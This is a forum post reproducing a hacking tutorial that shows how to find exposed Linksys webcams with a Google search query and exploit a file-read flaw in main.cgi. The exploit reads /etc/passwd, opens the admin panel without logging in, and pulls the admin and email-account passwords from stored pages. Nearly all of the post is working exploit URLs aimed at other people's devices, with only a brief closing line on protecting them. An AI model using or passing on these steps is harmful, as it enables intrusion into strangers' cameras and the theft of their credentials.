zbeng Posted September 9, 2006 Report Posted September 9, 2006 I. Finding a target.II. The problem.III. Accessing the Admin panel.IV. Finding emails and passwords.V. Conclusions.######################### I. Finding a target. #########################For this part of the tutorial, we'll utilize a simple google hack.If you search johnny.ihackstuff.com for Linksys Webcams you'll findsomething like this:inurl:main.cgiThe search that I utilized was:inurl:main.cgi?next_file=The service may be running on any number of ports, but the most commonports that I've seen are ports 80 and 1024.##################### II. The problem. #####################Once you've found a webcam using google, open the link in your favoriteweb browser. You'll see something like this in your browser.http://127.0.0.1:1024/main.cgi?next_file=img/main.htmThe problem that makes this hack possible is that main.cgi?next_fileaccepts any file, and reads it into the browser. So, obviously youcould access /etc/passwd.http://127.0.0.1:1024/main.cgi?next_file=/etc/passwdBut, we're going for something more interesting.#################################### III. Accessing the Admin panel. ####################################There are any number of ways the web interface could be setup, but thiswill only cover the default setup. Hacking any derivatives from thisstyle should not be difficult at all. Just look at the HTML source codeand find where the admin page urls are located.At the top of you page you will see a panel with something like this.Home View Video Setup Linksys WEB Help ExitSetup is the one we want. If you look at the source code you'll see thatthe link to setup is...http://127.0.0.1:1024/adm/file.cgi?next_file=basic.htmClicking on the link prompts for the username and password of the router.Remember main.cgi? Yeah, well since we can read any file on the systemwe're going to load basic.htm, the setup panel, without needing a password.http://127.0.0.1:1024/main.cgi?next_file=adm/basic.htmWow look at that. However, if you try to access something else from theregular administrative menu, you will be prompted for a user/pass combo.Now that we see how to load the menu, it's a trivial matter to obtaina legitimate password.http://127.0.0.1:1024/main.cgi?next_file=a...adm/pass_wd.htmJust look at the source code, around where the form is located and in plaintext there is the user/pass. In order to access anything else in the adminmenu, just open it up with main.cgi?next_file=adm/.Common Administrative Files.http://127.0.0.1:1024/main.cgi?next_file=system.htmhttp://127.0.0.1:1024/main.cgi?next_file=basic.htmhttp://127.0.0.1:1024/main.cgi?next_file=image.htmhttp://127.0.0.1:1024/main.cgi?next_file=pass_wd.htmhttp://127.0.0.1:1024/main.cgi?next_file=users.htmhttp://127.0.0.1:1024/main.cgi?next_file=status.htmhttp://127.0.0.1:1024/main.cgi?next_file=advanced.htm####################################### IV. Finding emails and passwords. #######################################One final interesting endeavor is to extract the password of the user'semail account. There's an option in Linksys that allows it to email youwhen the motion sensor is set off. The user/pass of the email accountmay also be stored in plain text.http://127.0.0.1:1024/main.cgi?next_file=a...dm/advanced.htm#################### V. Conclusions. ####################I've only run into one webcam that successfully blocked this type ofaccess. The result was a 403 webserver error. So if you want to keepyour passwords safe you might want to look into file permissions andother forms of data protection for your web camera.#####################################################################That's all for this article. I appreciate you reading this far.If you have any input/criticism please email me.stderr [dot] dev [at] gmail [dot] com.Shouts: cult, kaZm, SheepByte, and 34019.-stderr Quote
